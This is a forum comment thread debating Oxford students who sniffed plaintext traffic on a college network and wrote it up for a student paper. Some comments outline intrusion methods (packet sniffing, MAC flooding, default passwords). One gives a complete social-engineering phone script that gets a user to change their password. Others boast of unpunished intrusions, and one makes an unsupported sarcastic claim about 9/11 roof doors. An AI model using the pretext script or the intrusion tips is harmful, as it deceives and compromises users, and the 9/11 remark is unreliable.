White-hat my ass, they didn't ask for permission to crack the system first; they did it, THEN told them they did it, how easy it was and oh yea, it was for altruistic purposes.
I hate to disturb your dream here, but asking permission might have made life difficult. The point of the exercise was that anyone could do it, not anyone being watched closely. It's impossible for Oxford to closely watch everyone.
Sure, it was done altruistically. People with different motivation have been and continue to do the same things. They reported the problems they noticed so that other students would know what not to trust on campus.
We shall see what happens to them.
Friends don't help friends install M$ junk.
I do IT part time for one of the colleges.
The story in the Oxford Student was partly right, in that since much of the network is on Hubs and not switches, the students found they could read unsecured traffic. The students happen to be at a college were very little of the traffic is switched. But in almost every other respect, the story is over-hyped rubbish. They cannot get "anyone's" email password, which is what they claim.
So stop-press: AOL and email over non-switched networks is not secure. Great work guys.
Universities work very much on a model of trust. If they can access from inside the LAN then I'm not surprised they can penetrate with minimal problems. The main defense the University has is that it can stomp on anyone that commits any kind of abuse. Back before the Internet was a free for all (*cough*AOL*cough*) email and Usenet were spam and abuse free. This is because any student that tried it got chewed out by the University and often their accounts suspended.
It's fun to be free and explore. Personally I think their punishment should be that if they think their security is so bad they should be made to secure the network. Educational and constructive at the same time.
Phillip.
Property for sale in Nice, France
Ahh, but most people know that their houses are not secure and take further steps. Valuables and sensitive information is hidden or placed in a safe or safe deposit box. Most people do not know how insecure their M$ crap is.
This isn't a matter up for debate, it's the law
Laws should follow morals, not the other way around. Most computer laws are poorly crafted and are mostly protection for crappy software makers. It would be better for laws to do what they say and protect who they should.
Friends don't help friends install M$ junk.
What I find really scary is the feeble " we bought cheap systems, we can't secure it " excuses the systems admins are giving.
If they had used free software it would have been pretty secure out of the box (or whatever the eqivalent is for downloading).
Most of the places I have worked recently are using the famously secure and "trusted" software from "honest" Bill Gates, and, they have reasonably secure networks, it just takes a some actual admin from the sysadmins.
What software are they using that stores passwords in plain text? In the 21st century ? This is just plain neglegent, I think the students involved should pursue the college through the data protection act. In the UK anyone holding somebody elses personal information on thier computer system has a duty to secure that data and prevent access from unauthorised users. Clearly asking the student body to "please obey the rules and not look" falls short of "reasonable measures to protect ".
Old COBOL programmers never die. They just code in C.
It's better, if they are to be punished, for them to have made their point.
Friends don't help friends install M$ junk.
It's no secret that most university networks are swiss cheese as far as security goes. Normally it's because they hire students at cutrate wages to maintain the network. Most students' personal PC's are absolute spyware/virus/mass mailer heaven. I have done many a cleanup job on laptops that were once connected to campus networks. I've also talked to friends going to different schools about infected lab computers and switches saturated with spam traffic. In an environment like that, it's no surprise the servers never get patched. It's an accident waiting to happen.
The other thing I get from this article is that it's a good idea to expect to get nailed to the wall by your balls if you break into a system even if your cause is noble. It seems that most people with authoritah are more worried about how embarrassing the situation is than actually getting the problem fixed. So they want to nail the guys who made them look like a doof. I'll tell you this, if I ever find a vulnerability in any system I'm keeping it to myself.
-R
It looks to me like they installed a sniffer on their machine, and sat and watched all the traffic pass by - recording any passwords and network data. Easily done. No big deal. ... ATM machines found to be insecure after we stand next to one, and watch people key in their code ... telephone banking found to be insecure after we stand next to someone using it and tape record everything they say?
Whats next
I though Oxford students where supposed to be smart?
That's a good university, I'm sorry that they decided to move to compulsory computer administration. Scanning software for email is a big deal. Do I really want your half baked program deciding what mail I get? No. Turning on and off software on other people's machines is bad. Do I want you using my machine to block ports? No. Of course, I don't need that kind of thing, nor would your nasty little tools work, because I don't run Winblows.
There's a big difference between making a tool available and giving people a choice to use it and what you advocated above. I'd consider my email and computer owned by you if you did those things to me.
Moreover, I know that the steps you mention don't really do anything for security. All of those bandaids are nothing more than an inconvenience to the end user. The cracker, as has been so amply demonstrated in the last few months, goes on as before. Faculty at your University might understand better than you think that they will get little in return for your efforts and theirs.
Friends don't help friends install M$ junk.
I work at the university, and the essential facts of this case have been reasonably well known here since it happened several weeks ago.
:-) but suspending them, essentially for having no common sense, is a bit harsh. It would have been straightforward for them to obtain most of the facts they needed for the story without breaking the law and violating people's privacy (restrict the packet sniffer to specific computers where the owners had agreed in advance), but they chose not to or failed to think about it or do some basic research first.
The structure of the university means that the many parts of the university (the 'colleges') have independently run networks, all connected to the same university backbone. Many college networks aren't switched, either because of lack of time or resources, or because there's not all that much point - if you know what you're doing you can MAC flood the switches anyway from any port that is set to learn new computers (pretty much essential in libraries).
What the 'reporters' did was simply to run a packet sniffer on various unswitched networks. I think they managed to watch some CCTV coverage, read someone random's MSN conversation, and possibly pick up a few passwords. They then went and told the people they'd sniffed what they'd done, and wrote a rather over-sensationalised article about the security flaws.
This kind of thing (someone noticing the network is insecure and making a really big deal of it) happens every few years in Oxford, and usually it doesn't generate quite this much publicity. The university has gradually been developing a tougher line on computer misuse, which may explain their desire to throw the book at the journalists.
They are threatened with a 500 pound fine and being suspended for a year. Personally I think the fine is justified (the university could use it to buy some more switches
Good luck trying to run to the White House from the fence -- the handful of snipers that hang out on the roof are permitted to kill anyone they feel poses a threat. Better hope it doesn't look like you've got a bomb under your shirt.
So the people who exposed the negligence of the university authorities, thereby in the long run improving security, are to be punished. The pompous stuffed shirts responsible for the insecure network must obviously be protected from embarrassment at any cost.
The privacy of the people whose email passwords can be retrieved so easily (BTW why does the system hold unencrypted passwords anyway?) doesn't matter to anybody important.
and I quote "If everybody broke into a network would it still be unlawful. [?]" In a democratic society, YES if everybody is doing something it shouldn't be against the law in the first place because the "majority" ie:"everybody", is doing it. but democracy may work differently depending on who you are and where you are at, as proof, watch this comment get modded up as i hore the karma as annon coward :)
looks to me like these students caught the school with their pants down this time and now the school is crying to the police because 2 students are apparently smarter than the entire schools network security system. If you ask me these students should be gien high marks for this exposition rather than the sort of (knee-jerk) reaction they are currently recieving.
to the students i say, nice work!
to the school i say, grow up and fix the hole.
In other news, small fish are arrested for swiming thru a rather large dragnet that reportedly had holes in it.
yes, there are most likely sloppy admins / clueless it people / etc. involved and they deserve the spanking that comes their way. that, however, doesn't excuse these men. they are (like myself) young and lacking in experience (read: stupid). but it doesn't take more than a second's worth of thought to realize that what they did was an act of monumental idiocy and recklessness. did they attempt to contact oxford's i.t.? articles seem to imply no. did they attempt to go to whatever oxford's equivalent of a dean is? again, the articles imply no. instead they exposed oxford's network to even more danger by announcing the flaws before their i.t. people had a chance to fix things. this isn't at all like a parent seeing an unlocked medicine cabinet in a daycare facility and then trying to tell the relevant people about it; this is more like a parent noticing an unlocked cabinet in a daycare facility and then announcing to all the kids how to get into it.
it's not fair, etc, etc, etc
Suttree, a weblog about casual games development
what now they have started teaching hacking in school ? good goin !
Chris ,
Php Programmers.
Disclaimer: These are my own views, and do not necessarily represent the views of either the college I work for, nor Oxford University. Right, that's out the way, then. I work for the college that one of these students attend. So far there's been very little said by the IT staff on this matter - it's all been done by the official channels of the university. But this seems to be a good place to set the record straight on a few things. These students didn't hack anything. All they did was sniff some tcp/ip traffic. That they could only do because it was the last hub left to upgrade in college. I'm fairly certain they wouldn't have had the intelligence to bypass a proper switch, but even then, it's hardly a massive security failure. None of the college's administration systems were compromised in any way. None of the student servers were compromised. The emails and passwords they compromised were not the official university ones, and if they were, it is because the email clients were not configured properly. The new webmail interface (unpopular for a reason that's beyond me) is through https: and therefore secure. They only got these passwords at all because email passwords under pop, as well as imap if you don't use ssl, are transmitted through clear-text, people. Just like msn messenger and the internet. Somehow we are being held accountable for how the internet works. Maybe it's because Tim Berners-lee attended here. There is no real problem here, except the issue of user awareness. And that was in no way raised by the article these two hacks wrote - rather people are more paranoid (not a bad thing in itself) yet further misled in their understanding of the university networks. It is not journalism to create a story. It is journalism to report a story in a fair and unbiased manner. Out of the article printed by these two in the Oxford Mail, the various editorials in both the above and the other Oxford Student paper, the Guardian and the BBC, the only unbiased report I've seen is from the BBC. And even then it's because you get the impression they're too lazy to get involved ;op
No, that's not journalism. That's scare-mongering.
I agree with those people who say this should not have gone to the police - but by that time it was being handled by people who didn't understand the technicalities of what these people did.
The only thing I think that is dumb on the administration's part is having the Closed Circuit Televisions controlled via the internal network, that shit should be on a totally different network
Yeah, exactly. That wasn't us, btw. But even so, I'd like to point out that being able to access a security camera in a public area is not exactly a breach of privacy. Just a bit dumb of whoever put it in. Probably someone going over the head of the IT admin , if I know oxford...
Somebody fire this person (re: the comments by IT officer A)
It's better to stay quiet and be suspected a fool than open one's mouth and remove all doubt.
These were members of the legitimate press, who in the course of their duties as members of a free press, alerted a population about a situation where the authorities who they trust to provide security have failed in carrying out their responsibilities
Uh.. I don't see it as the duties of the free press to break the law in order to create a story - or even to report one. As for the failing of responsibilities - it should be obvious by now that this hasn't happened.
Have you heard of Whistleblowing
Have you heard of Shit-stirring?
That's true, but what about when an intranet is left open and someone, exploring the network, stumbles upon it?
My friend's wife once found the answers to all the homework and exams during a class on computer administration, while viewing the intranet from her workstation. The files were not password protected and there was nothing indicating that this was supposed to be private (before opening it).
She realized this wasn't right, and told the teacher. Unfortunately, the professor was not pleased, and the school tried to expel her on grounds of illegally cracking into the network! In the end, she was forced to drop the class even though my friend's wife knew more than the teacher himself! (I think the college's lawyers realized they could be sued if they expelled her.)
She wasn't the only one. A while back, I heard about a case where the New York Times sued a hacker when he found a security hole in their network and told them about it (and didn't do anything else). In both cases nothing was damaged at all, nothing was really seen and nobody was hurt. It's like someone notices that your back door's lock is broken, sends you a letter about it, and you sue them for trespassing.
What I'm saying is that we need some kind of legal protection for these kind of accidental "hacking."
It is impossible to enjoy idling thoroughly unless one has plenty of work to do.
- Jerome Klapka Jerome
So the Proctors enquire of the editor as to the veracity of that claim. Even Oxford students could spot that flaw in your plan.
The thing is can you really expect any university with a decent CS program (and therefore a large concentration of possible hackers) to be able to really secure their networks against their own students without spending a ton of money? Just by being a student you already have a valid username/password to start with which makes it pretty damn easy. Most universities rely on the hope that students will have enough decency to not hack the network.
I'm not saying I think they should be charged with anything but they should have remembered these old words of wisdom: Don't shit where you eat.
show the Secret Service (hey, this is sarcasm. I don't need you guys to visit) how easy it is to jump the fence at the whitehouse and run across the lawn
Yes, but show me how you can do this undetected and potentially kill the president? (I am not daring anyone to do this, nor implying that I would want to kill anyone! ;-)
Alright, now somebody do this and shoot the president with a water gun. That would be soooooooooo cooooooooooool. Seriously. ;) Or a little (obviously fake) gun that puts out a flag that says "Bang". Probably better, no actual contact with the president, just show them you can do it. Nothing really threatening, don't do it with a gun that even remotely looks like it might shoot bullets (you'll get shot). In fact, you might just want to say "bang" and possibly add "this is a prank to show how insecure the system is in an attempt to help to secure the president better, and I have a toy pistol that will put out a flag that says 'bang' and it would be really funny and we'll all get a good laugh, but I don't want any of the SS guys to think I'm actually shooting the president. May I?"
So, yeah, don't get shot, and don't hurt anybody, and don't actually break any laws doing it. ;)
Like what I said? You might like my music
Everyone seems to be making a big fuss over this which isn't such a big deal. Oxford computer society's take on it was this. What they did wasn't anything fancy, it was just bummed up for the paper because exciting things don't happen in oxford very often. I've no idea why the guardian and the eeb are reporting this now, 1.5 months after the OxStu's headline, perhaps it's just a slow news day or somthing. This is all getting blown out of all proportion, at the time I thought what a big pile of bollocks and now this is just rediculous
From the BBC story:
"Two students from Oxford University are facing disciplinary action after hacking into the university's computer."
i dont know thse uni sysadmins dont care
i crashed my uni server with code posted on slashdot the the week b4 last week they are still running 2.4.22
Actually, if everyone does a particular thing, sometimes it becomes legal.
If you don't have 'no trespassing' signs on your yard and kids walk through it every day for, say about 7 years (this is the usual) you can actually lose the right to stop them. The area becomes public domain for a particular purpose.
It would be interesting to see this applied to a network.
(IANAL, btw)
___
It's the end of my comment as I know it and I feel fine.
I'm sorry, but being a member of the 'press' (In this case reporting for a university paper) does not give you the right to break the law. You're confusing it with the right to free speech.
They were well within their rights to report on the situation, but they did not have the right to break the law. They have been prosecuted for the latter, not the former.
If you leave a car open here and someone else drives away with it, then you are guilty of a "misdemeanor" over here (de). Of course it still is not legal to take the car.
A similar rule should apply with regard to networks that are supposed to be secure but in fact are open (at least to a certain degree, to be defined).
This in cases as described by you would balance the situation (OTOH, if one considers the average knowledge of local judges on IT matters - alas - some have a hard time to send an e-mail).
CC.
TaijiQuan (Huang, 5 loosenings)
Well, NYFD did act. After noticing that after the first attempt to topple the WTC (26th Feb 1993), the police department successfully rescued some people via helicopter from the roof, they had to act.
Indeed, fire departments advice is to always flee downstairs never upstairs. The NYPD's intervention was a dangerous interference into the fire department's work, and a re-occurrence of such a bold stunt had to be prevented at all costs.
The fire department rejected recommendations from police pilots that an area of the north tower's roof be kept clear for helicopter landings. The antennas were put back up. And mostly for security reasons, the Port Authority kept the two sets of heavy metal doors leading to the building's only roof exit tightly locked -- as they would be on the morning of Sept. 11, when they successfully kept the victims securely trapped in the towers, all the while police helicopters were hovering overhead, wondering why nobody fled to the roof...
I wonder how many other large 'internal' networks are open to the same issues!
I would bet on many - including my own at work.
Don't send passwords on the LAN in clear text - its a bad idea(tm).
edukayshun, educayshun, edukayshun,,,
your data is a risk if you send it in plain text over the network...
They aren't even good script kiddies -- they got caught way to easily.
They were 'caught' because the newspaper had their names at the bottom of the article.
Firstly, please let me clarify a few points about the article and the way stuff is run at Oxford:
My understanding of what has probably happened is that one or more colleges have skimped on network hardware and not installed the recommended switched network equipment with MAC address protection.
Alternatively the students may have found a way to defeat the security on the switch they're connected to that allowed them to mirror other ports' traffic down their port.
Although they did sniff passwords for a University provided e-mail service, it seems that everything they did was within a college network.
To say that the University network was hacked, as both the /. article and the student rag suggests is not accurate and vastly inflates the scale of what these students "achieved".
Alnitak - Oxford graduate and ex-staffer.
How is all this significantly different from impersonating a mental patient or investigating meat packing plants?
You think they should call ahead and clear everything, so they see the fine state of the mental care facilities, and how nice clean and sanitary meat packing is? "Sure, let me set up this shell for you to try and hax out of..."
PS., if you fail the reference, you're missing out on what defines great investigative journalism, as these are specific examples from "recent" US history.
university campuses tend to almost have their own legal systems
But with the entire event being isolated to a university campus...
There is no single campus at Oxford, only a collection of Colleges, Libraries and Faculties.
The policing of Oxford students is dealt with mainly by the Colleges and the Proctors. The Proctors can be quite fierce if they fail to see the funny side. They are also quite old fashioned - most students hope only to encounter them at ceremonial occasions when they'll be wearing gowns and funny hats. There are also the 'Bulldogs' who are basically the heavies for the Proctors and go round in bowler hats and used to chase the students out of pubs in the old days.
In this instance, the fact that the story was splashed on the front page of a newspaper with circulation throughout Oxford (rather than just within a campus) probably caused a lot of embarassment. Added to which, I wouldn't be surprised if the Proctors have very little understanding of exactly what has been done or how. They will assume the worst. They probably just want to be seen to be taking the matter seriously and don't know exactly how serious it really is or what reaction is appropriate. In any case, rustication isn't so bad - you can come back to study once you've served your time away). They could have been 'sent down', in which case it'd be game over.
Yeah yeah.. permission and all that.
- Did they break anything? Delete a log? Probably not.
- Did they tell what they did? Disclose the flaws? Yes.
Can someone please hit this uni with a clue stick? Look at my ISP: xs4all.nl (granted, they are formed by a early 70's Dutch hacker group, so they grok security pretty well..)
xs4all gives out FREE acoounts (for a year) to ANYONE who gains un-authorized access to their systems... and TELLS about it. They will file police reports only, if you DONT tell...
"/Dread"
Back in the 1970's there was a kid in my junior high school who hacked the schools computer to see what he could do in a few hours.
As soon as he was done, he went to the office and turned over all his information on how he did it and what he was able to access.
You know what they did? They expelled him on the spot. And you think it's going to be a kinder more reasonable world 30 years later in a more socialistic country than here? Say what you will about the University, but these kids are street-stupid for even attempting something like this without some insider acknowledgement before hand.
"A monkey could do it with the right software."
As an unemployed Unix Administrator currently working in a Zoo to pay the rent I can put this to the test.
Situation:
Pentium 3 750mhz, Knoppix boot CD, unswitched network, plain text protocols running over network, 3 Columbus Lemur Monkeys.
Test 1 Monkey sat infront of screen and left to own devices.
Result 1 Neither monkey acheives much, taking no interest in the screen.
Test 2 Console opened, "ethereal" typed in as hint, monkey sat infront of screen.
Result 2 Again monkeys take little interest, monkey 3 does paw at the screen for a few minutes. Monkey 1 is distracted by small child waving icecream in its face, result for monkey 1 discarded.
Test 3 Ethereal opened, required options selected, bit of banana left on the enter key.
Result 3 All monkeys successfully grab the banana, triggering the enter key, and starting the packet sniffing session, in each case all plain text data over the network is recorded - SUCCESS!
So kids, as we've shown, a monkey is quite capable of doing this kind of hack. Now nobody is safe.
When I was at high school I said to one of the IT teachers. You know, your network is incredibly insecure, he huffed and puffed. "Shall I show you?", says I, "Yes, please do" says he. I show him, he sends me to the headmaster, I get suspended for three days and the network remains broken. A fine reaction, best for all parties!
This situation seems rather similar, people working for the school paper hack without malicious intent, an embarassed institution moves into oppressive mode. Although a law may have technically been breached, surely this wasn't against the spirit of it. They were not explicitly hoping to steal information, and they reported exactly what they found.
These people are not being punished for breaking the security of the network, but their disclosure thereof. A stupid reaction, by what purports to be an intelligent instituation.
[I am an IT professional at University of Oxford, but I'm not associated with the College concerned - just passing on what I've heard locally].
One thing that doesn't come out very clearly in the Oxford Student article, or the subsequent press coverage, is the nature of the "hack".
As I understand it, the college that the students attend uses still uses some ethernet hubs, rather than switches (this is where the quote about the "cost" of security comes from), and the students just packet-sniffed the traffic that was going past on their local network segment. They found exactly what anyone who knows a bit about networks would expect to find.
The problem (as so often!) is more social than technological: the users of the network have expectations of privacy which the implementation doesn't provide.
The failing on the part of the University not so much in the area of technology and IT security, is more in the area of user education: people using the facilities need to be made aware that the ethernet that you share with a couple of hundred other students is in no way private, any more than a conversation held in the JCR (college bar) is ...
The University is on the whole, very security concious. The mail servers, shell machines, web servers, etc, provided by the central Computing Service all provide access via SSH or SSL encrypted connections (and frequently for anything that requires a username and password, only via such connections).
One thing that does puzzle/concern me is the allegation that a CCTV feed was accessed. So far as I know, all the CCTV systems operated by the University security service run over seperate fibre optics and are kept strictly segregated from the general purpose data network.
When you look at what they technically actually did.
They ran a packet sniffer on a network and managed to log plain-text protocols.
Now I understand freedom of press is important, but not when it is being used to proove things that have been known for years and could be proven without breaking the law.
All they had to do was look at the bit saying HTTP instead of HTTPS on the URL for the webmail and they could have drawn the same conclusions without touching anyone elses private data and without breaking the law.
I fail to see why freedom of press comes into it, freedom of idiots maybe.
I'm a postgraduate at my university, and the BOFH that runs the IT network treats us like a bunch of criminals, even us postgrads. He's a total and utter bastard, and they lock down the network so tight that we spend 30% of our time dealing with the restrictions. ..yet they allow IE on the PC's.
ssh and minute social engineering skills?
The ordinary and practical distinction is between and murder and manslaughter, an assault that ends in death though you never intended to kill. Both are homicides and both are criminal.
The problem is its not in the IT guys interests to fix it or let anyone know its broken so if you bring it up with them they're just gonna pretend you broke it and make a fuss. The people at the top don't want that sort of reputation either so they're not going to side with the bringer of bad news as long as they think they can make it all go away. If you believe the security is bad enough to put you at risk you could always rat the little buggers out, the data protection act will cover your ass here you have the right for your personal data to be kept secure but you dont have the right to break it so if you have done, keep very very quiet about it and just point someone else in the right direction. Anonymous letters might be a good option if you want it on the front-page.
This comment does not represent the views or opinions of the user.
Firstly, it's not "principle", it's "Principal", and even if it was, it would be "priciple's office". Secondly, I doubt Oxford has a Principal. The normal head of a UK university is the Vice-Chancellor, but Oxford like to do things differently so maybe it's a Rector.
Quite right, and they're not 'kids' either - they're adults. The head of OU is the Vice-Chancellor but he'll be far too busy for such things as this. Appropriate people to talk to (the chain of command if you like) would be college or university IT support staff, college officials and lastly the Proctors - those responsible for student discipline and the actions being taken on these individuals.
But with the name and passord of the admin acount simply "admin" it was more their stupidity than my genious. At some point they detected my presense( ok maybe I shouldn't have replaced the default background on all of the school computers) and shut down all of the computesr on campus to figure out what happened. They never really discovered it was me,hence no punishment! They gave a stiff warning that they would punish anyone respponsible for such hijinks in the future, and i decided that it wasn't worth providing them with any more motivation to catch me.
Well.. maybe. Or Maybe not. But Definitely not sort of.
And on another level, they can force people to use some amount of SSL. Make the mail server SSL-only, for instance. This is especially the case at my university: each student is issued a standard university ThinkPad, and they can control the load on those things. Set up a secure POP connection, have the new laptops set up to use it, and within one replacement cycle (two years) you can have everyone checking their mail securely. Would this be excessively burdensome? It won't protect your web mail or Slashdot account from packet sniffing, but it keeps your email (which usually shares your Important University Password) nice and secure!
(Incidentally, they've been loading Mozilla on them for mail and browsing. I can only see good coming of that, at least.)
The World Wide Web is dying. Soon, we shall have only the Internet.
Suppose in America the majority begins to infringe on the free speech or exercise of religion rights granted by the Constitution. Does that make it right?
At the heart, you're advocating a "might makes right" system. Do you really want to live under the "law of the jungle"?
Using easily available software Does this say script kiddie or not?
http://www.macinhack.com
Way back, when I was about 12 or 13 and networks were rather less advanced, I identified a potential security flaw with the system at school. I was on good terms with the teacher responsible for IT, and suggested that it might be prudent to address it. She asked me to try to hack the system, to find out if it really was a vulnerability. The following day, I told her her own password.
She physically locked me out of the computer room for a week, along with one of my friends who'd been in on the game, while she worked out how to close the loophole. :-)
The people I always felt really sorry for were the kids two or three years younger than us. It was normal for a couple of sixth formers (for non-Brits: 17-18 year olds, the oldest generation in the school) to help with the sysadmin jobs, and my friend and I were nominated. When the same two or three "loopholes" were found and "exploited" by the younger kids, their screens started flashing bright red and the PC speaker locked on until they managed to struggle under the desk and flip the boxes off at the plug, thanks to a couple of... um... extra software installations, courtesy of the sysadmin team. Needless to say, by the time they emerged from under said desk, the whole room would be looking at them and I or one of my colleagues would be standing behind them with Stern Look #673 firmly in place.
Of course, we were always smiling with quiet admiration on the inside, and I always felt really bad about doing that to them. }:-)
If you disagree, post your argument. (-1, Overrated) isn't your personal censorship tool for views you don't like.
I got a two day suspension for it! (highschool) Be proud that it was harder to get a suspension than our high school. If you were doing an incorrect shutdown of the computer and the ScanDisk was coming up on next reboot, the last user was getting a 2-day suspension. They claimed ScanDisk "could severly damage the computer".
Remi
Home sweet localhost.
Im sure this kind of stuff is commonplace in Universities. I myself knew people who had or could get root access on machines from where (anything goes) in fact we had a room of NeXT stations that were mysteriously taken offline after someone I knew ran the unix "crack" password cracking tool on them. Another friend of mine had similar experiences at his uni.
Generally speaking it must be very difficult to ensure a secure network at a uni. The sheer variety of different machines and operating systems, and the ad-hoc nature of the network will invariably leave gaps in the security.
However i'd like to hope that most students are just excersizing their enquisitive nature and doing little harm in the process, after all University is "yours" just as much as it is the people who run or own it. It is a seat of learning after all!
nick
Electronic Music Made Using Linux http://soundcloud.com/polyp
I believe that it is the law in England (and Wales) that if you know of a criminal act taking place then if you do not report it to the police then you are deemed to be an accessory after the fact and have hence committed a criminal act yourself.
Therefore, once the University was informed of the criminal acts (breach of the Computer Misuse Act) they had to inform the police. They had no choice in the matter.
Agrajag: "Oh no, not again!"
That's what I love about this country. If you do something like this, particulary at a state University, you could face felony charges.
no text
Reminds a bit of a dumb phone call tracking system we have at my work. I noticed it records the hash key presses and the customer numbers and pins of everyones telephone banking. Silly old phone system
While this thread is tired now, I'd like to make the following point:
IANAL but:
Surely, as a data controller, UO has breached its DPA 1998 duties. Also, would the university be liable for a class-actin lawsuit by students who are the data subjects of data held on UO boxen?
When i was at collage...
And, um, which collage did you go to?
Evil is the money of root.
Even in those cases where you do have the budget for an experienced network admin, all you've done is made it so that the weak link is no longer the network. Now, it's the users.
*ring *ring*
User: "Hello?"
Hacker: "Hi, is this Jane Doe?"
User: "Yes, who's this?"
Hacker: "Hi Jane, my name is Dirk Diggler, I'm with the university's computer department. We're presently migrating all of the user data for the arts department, and we need to copy your data over to the new server. Don't tell me your password; as you should know, you should never give away your password. However, we do need to access your account to make sure all of your data is successfully backed up, so what I need you to do is to log into your account, and change your password to 'test' for now. Once we've finished moving your data, I'll call you back and get you to change it back to whatever is is right now."
User: "Uh, OK, how do I change my password?"
Like woodworking? Build your own picture frames.
That is always the best idea. If someone exposes your securtiry flaws fine them and call the police.
Many young men are so naive about social power hierarchy.
Please, all future kiddie hackers, realise that people at power are *always* more concerned about their power than about technology flaws or productivity/effectiveness of systems they control. And showing their failure in public makes them very angry, because it can endanger their image of power control the most.
Next time, if you do it for sport, do it quiet. Make yourself an outer image of a complete moron. Enjoy your insight. A fame is without purpose for you.
There you are, staring at me again.
I mean, who in their time at Oxford didn't load up their favourite ethernet sniffer, and take a look at the traffic flowing past (usually, the networks are made up of hubs connected to swtiches, owing to cost, so you can see traffic for 10-20 other computers). The difference with myself was I then showed this to the college IT officer, rather than the student papers, so actually got something fixed.
The big problem is lack of funds and lack of time. College IT people (the sniffing in question took place in a college, on the college network, not the main uni network) tend to have themselves and an assistant to look after a few hundred student machines, a few tens of multi user workstations, and then all the machines of the staff (50 odd, and must take priority). Oh, and they don't have enough budget. Thats why the problems remain
For anyone who knows Oxford, one of my friends wrote a very good spoof of this - http://www.ox.compsoc.net/~sheldon/oxstu.html (if you don't know Oxford, you might stuggle to get all the points...)
This post will enter the public domain 70 years after my death, unless Disney buys another extension.
well, leave it to some students to hack into their school's network! It's awful what they did, but even worst, the network shouldn't be so insecure, i feel bad for students that might have gotten their passwords stolen. The network admin's should make sure it doesn't happen again. They could do some nasty shit, like change passwords and lock people out of the server, they could delete files, and if it had NetBIOS or some crap like that they could bring down many computers in their network, and all kind of malicious stuff.
Were they whitehat or were they blackhat?
Shame on the admins, shame on them.
Yesterday I was in staples and they have those keychain wifi detectors. I clicked the button through the plastic to see if they had batteries in them already and not surprisingly there's a unsecured wifi network in the building. After looking around and not finding any displayed pc's running on wifi I figure it's the cash registers (it was a 802.11g network) and just let the matter drop.
I could tell them about it but then you'd probably be reading about me in another week.
The reason why this is important is because of the idea of immediacy. When a person is looking at a headline, they determine whether or not it has any bearing to them. If an article doesn't have any immediacy to them personally or to their interests in general, then it doesn't get read.
There is little technical difference between these two headlines, however from the point of view of an Oxford student, there would be a world of difference. Consider:
Headline one: HTTPS provides encryption that HTTP does not.
Headline two: Private computer conversations at Oxford easily monitored by anyone.
However, they didn't just log some passwords sent in the clear, according to the article (you did read it, did you not?) they had the ability to view and to some degree controll the pervasive CCTV security network. This is a big deal, for a whole lot of reasons.
You say things about stuff that's been known for years and provable without breaking the law. Known by whom? I would guess this stuff wasn't known by the general public at Oxford, the population that that particular paper is supposed to inform and serve.
If you fail to see why it's important that the press informs the population about security matters in a time of echelon, and increasing government infringements on the rights of ordinary citizens, then you might want to spend a little more time meditating on the phrase that you used, freedom of idiots...
HaXXXor.com - Naked Chicks Teach You How To Ha
We have this thing called the Internet now. And hence, you don't need to do any 'system programming' to snoop network traffic. The tools are widely available.
If student rumour is correct, there's an unrepealed Oxford law by which Crusaders on their way to the Holy Land could stop by and pick up a degree. Apocryphally, students have tried to invoke this right and been turned down by the Proctors because they weren't wearing their swords when the claim was made.
There is also meant to be a law still in force by which you can request a glass of sherry be brought to you during Finals exams. I don't know if anyone has had the balls to try it - it's exactly the sort of thing the Proctors find unamusing.
Cracking into a computer is wrong (unless you have written authorization to do so) their intent wasn't malicious, but by the lack of respect in not informing people before the article went to print that in and of itself is malicious.
They should be made examples of and sumarily expelled for their actions.
It sure is unfair that you are bieng punished, by "possible suspension" for commiting a crime that would land some of us in prison for at least 5 years.
I am Bennett Haselton! I am Bennett Haselton!
However, no-one knew about this apart from us. After explaining things to the college, they let us go and kept pretty quiet (i.e. they didn't tell CERT, which they were supposed to). The bottom line is, if you go public with any security breach you damage the public image of the university/college/IT department. They really hate it when you do that, mainly because they think it will have some effect on charitable donations and the political popularity of the Oxbridge system.
The thing is, in your first year you probably don't realise how touchy staff can be.
OK, I went to a fairly typical good English University so your experiences in the states may be different but...
Some college's and uni's send grades,
schedules and who knows what else
directly to students' email. Pretty
handy for a stalker right?
Perhaps - but I'm not sure what a stalker would do with a set of exam results - I mean medical results are obviously confidential but exams people generally tell all and sundry about (if you do well, to boast, if you do poorly, to complain about the questions being harder than the past papers). Besides a person's exam results, like their timetables, are generally available on the student noticeboards (and the departmental websites) so cracking their email doesn't make much difference. As for campus doctors, I would be very annoyed if I was sent anything more personal than perhaps a time for an appointment via email, but all doctors I've had are pretty sensible people and wouldn't send that sort of information through an unsecure medium (which, unfortunately, at university includes the post).
The public availablity of exam results is important for employers and students - because here in Britain most exam results are published (for some professional qualifications such as the law and accountancy they are put in the national papers!), there is far less risk that sutdents will lie about their grades to an employer, thereby protecting the honest employees.
just my 0.031 euros worth...
Oxford has never heard of secure services. C'mon, do people still run IMAP over a plaintext connection? If you are guilty of this, you are an idiot.
It is always difficult to get people to understand that just because they are behind a firewall, virus-scanner, and NAT router (etc), they are not necessarily secure. Harder so when you tell people this and their eyes glaze over.
In short, not everyone reads slashdot. Many people going to college, are not going for IT.
As for showing how the system is not secure, that in it's self is difficult to explain to laymen, and sometimes people who do have half a clue. But Messaging, E-mail and the like which is sent plaintext is by no means secure. That is what my first point was about, that unless the system is using SSL, Blowfish, or whatever tickles your fancy in cryptography, it is not going to be secure; and that is half a folly usually on the end user. The other half yes, lays on the system for not implementing the security measures, but they usually are not implemented anyways unless in a high security setting.
It is not a dream to talk to people and see if it is ok to do something first. It is civil. White-hats don't go around and break into systems all willy-nilly, post an article that THEN tells the people what is wrong (The administration as well as possible other types that could use it for much worse causes). They would have contacted the people either before hand, or right after-the-fact. I am NOT calling them Black-hat by any means, but they are not White-hat either. I thing Gray-hat fits here.
As for Altruism on the part of the journalists, I really do doubt that, I think it was more ego masturbation then anything, and people who know the journalists will probably be saying "Sw337, Ur 50 1337". (Sarcasm aside, I really think people will eat up this juvenile way of getting information [Packet sniffing]).
But I also would like to see what happens to them, I hope it's just a slap on the wrist, I really do. But I also don't feel that making them into slashdot saints does any good either.
Thanks for the Counter-Points mate; I always appreciate a good argument.
Charge Reduced For N.C. Student Who Hid Box Cutters On Plane
Short summary -- student hit boxcutters on a flight in order to demonstrate the weak airport security. The cops were not amused.
Chip H.
EECS700 II at the University of Kansas deals a lot with breaking into security systems from a practical manner. Though we had to sign a document saying that we would not use the skills we were learning to break into the campus network on risk of Failing the class and possibly being removed from school entirely.
The entire class revolved around installing Linux on machines, and then securing them as well as possible with a weekly or bi weekly evaluation of the computers defences. (IE if we hadnt shored up the machine to a specific attack we would lose points).
It was a very interesting class, and has kept me interested in network computer security.
(remember, if all else fails put a little PAM on it!)
If you don't vote, you don't matter, so don't waste your time telling me your opinion
